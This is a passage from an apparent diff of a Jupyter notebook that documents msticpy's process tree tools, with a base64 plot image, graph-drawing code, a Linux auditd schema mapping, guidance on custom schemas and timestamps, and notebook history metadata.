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",
+      "text/plain": [
+       "<Figure size 1440x1440 with 1 Axes>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "import networkx as nx\n",
+    "import matplotlib.pyplot as plt\n",
+    "p_graph = nx.DiGraph()\n",
+    "\n",
+    "p_graph = nx.from_pandas_edgelist(\n",
+    "    df=full_tree.reset_index(),\n",
+    "    source=\"parent_key\",\n",
+    "    target=\"proc_key\",\n",
+    "    edge_attr=[\"TimeGenerated\", \"NewProcessName\", \"NewProcessId\"],\n",
+    "    create_using=nx.DiGraph,\n",
+    ")\n",
+    "\n",
+    "plt.gcf().set_size_inches((20,20))\n",
+    "pos = nx.circular_layout(p_graph)\n",
+    "nx.draw_networkx(p_graph, pos=pos, with_labels=False, node_size=50)\n",
+    "# Get the root binary name to plot labels (change the split param for Linux)\n",
+    "labels = full_tree.apply(lambda x: x.NewProcessName.split(\"\\\\\")[-1], axis=1).to_dict()\n",
+    "nx.draw_networkx_labels(p_graph, pos, labels=labels, font_size=10, font_color='k', font_family='sans-serif', font_weight='normal', alpha=1.0)\n",
+    "plt.show()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Adapting the input schema of your data\n",
+    "\n",
+    "The process tree builder uses generic names to map common event\n",
+    "properties such as process name and process ID between different\n",
+    "input schemas.\n",
+    "\n",
+    "For example, the schema for Linux auditd data is in the following cell.\n",
+    "The key is the generic name and the value is the input data column\n",
+    "name that will be mapped to the generic field.\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 20,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "{'process_name': 'exe',\n",
+       " 'process_id': 'pid',\n",
+       " 'parent_id': 'ppid',\n",
+       " 'logon_id': 'ses',\n",
+       " 'cmd_line': 'cmdline',\n",
+       " 'user_name': 'acct',\n",
+       " 'path_separator': '/',\n",
+       " 'host_name_column': 'Computer',\n",
+       " 'time_stamp': 'TimeGenerated',\n",
+       " 'parent_name': None,\n",
+       " 'target_logon_id': None,\n",
+       " 'user_id': 'uid',\n",
+       " 'event_id_column': 'EventType',\n",
+       " 'event_id_identifier': 'SYSCALL_EXECVE'}"
+      ]
+     },
+     "execution_count": 20,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "import attr\n",
+    "from msticpy.sectools.proc_tree_builder import LX_EVENT_SCH\n",
+    "attr.asdict(LX_EVENT_SCH)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "If your schema differs from but is similar to one of the built-in\n",
+    "schema mappings you can adapt one of these or supply a custom schema\n",
+    "when you build and display the process tree. The example below\n",
+    "shows how to adapt an existing Linux schema for different column\n",
+    "names in the source schema.\n",
+    "\n",
+    "You can also supply a schema as a Python ``dict``, with the keys\n",
+    "being the generic internal name and the values, the names of the columns\n",
+    "in the input data.\n",
+    "\n",
+    "```python\n",
+    "from msticpy.nbtools import process_tree as ptree\n",
+    "from msticpy.sectools.proc_tree_builder import LX_EVENT_SCH\n",
+    "from copy import copy\n",
+    "cust_lx_schema = copy(LX_EVENT_SCH)\n",
+    "\n",
+    "cust_lx_schema.time_stamp = \"TimeStamp\"\n",
+    "cust_lx_schema.host_name_column = \"host\"\n",
+    "# Note these are used to filter events if you have a data\n",
+    "# set that contains mixed event types.\n",
+    "cust_lx_schema.event_id_column = None\n",
+    "cust_lx_schema.event_id_identifier = None\n",
+    "\n",
+    "ptree.build_process_tree(auditd_df, schema=cust_lx_schema)\n",
+    "```\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Timestamp column\n",
+    "\n",
+    "The ``time_stamp`` column must be in pandas Timestamp (Python datetime)\n",
+    "format. If your data is in another format (e.g. Unix timestamp) you should\n",
+    "covert this before trying to use the process tree tools. The example\n",
+    "below shows extracting the timestamp from the auditd mssg_id field.\n",
+    "\n",
+    "```python\n",
+    "linux_proc[\"ts\"] = pd.to_numeric(linux_proc[\"mssg_id\"].apply(lambda x: x.split(\":\")[0]))\n",
+    "linux_proc[\"time_stamp\"] = pd.to_datetime(linux_proc.ts, utc=True)\n",
+    "```\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "\n"
+   ]
+  }
+ ],
+ "metadata": {
+  "hide_input": false,
+  "history": [
+   {
+    "cell": {
+     "executionCount": 1,
+     "executionEventId": "c9451ae0-7573-4d33-a1b8-cf5b5be8d389",
+     "hasError": false,
+     "id": "fa78b92a-9c62-42ac-9374-8819e7e97c4a",
+     "outputs": [],
+     "persistentId": "7b5a3079-d2e1-481d-a076-8eaa96f1c430",
+     "text": "import pandas as pd\nimport numpy as np\nprocs = pd.read_pickle(\"../demos/data/processes_on_host.pkl\")"
+    },
+    "executionTime": "2019-12-13T19:49:28.220Z"
+   },
+   {
+    "cell": {
+     "executionCount": 2,
+     "executionEventId": "2178d8c6-39f9-4866-bad1-6881e8e1b7f3",
+     "hasError": false,
+     "id": "c9a26d41-49e0-4719-9527-bea817c683fe",
+     "outputs": [],
+     "persistentId": "23f15d93-9749-4e85-a4ca-a112e158bf76",
+     "text": "testdf = procs.iloc[:1000]\npd.to_pickle(testdf, \"../demos/data/win_proc_test.pkl\")"
+    },
+    "executionTime": "2019-12-13T19:49:31.754Z"
+   },
+   {
+    "cell": {
+     "executionCount": 3,
+     "executionEventId": "6239dc3f-281d-4506-820b-58aef5a85a7d",
+     "hasError": true,
+     "id": "39db5727-dea8-4b85-bedf-5d9f225bef86",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "\nThis product includes GeoLite2 data created by MaxMind, available from\n<a href=\"https://www.maxmind.com\">https://www.maxmind.com</a>.\n",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "\nThis library uses services provided by ipstack.\n<a href=\"https://ipstack.com\">https://ipstack.com</a>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "name": "stdout",
+       "output_type": "stream",
+       "text": "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n"
+      },
+      {
+       "ename": "ModuleNotFoundError",
+       "evalue": "No module named 'msticpy.sectools.process_tree_utils'",
+       "output_type": "error",
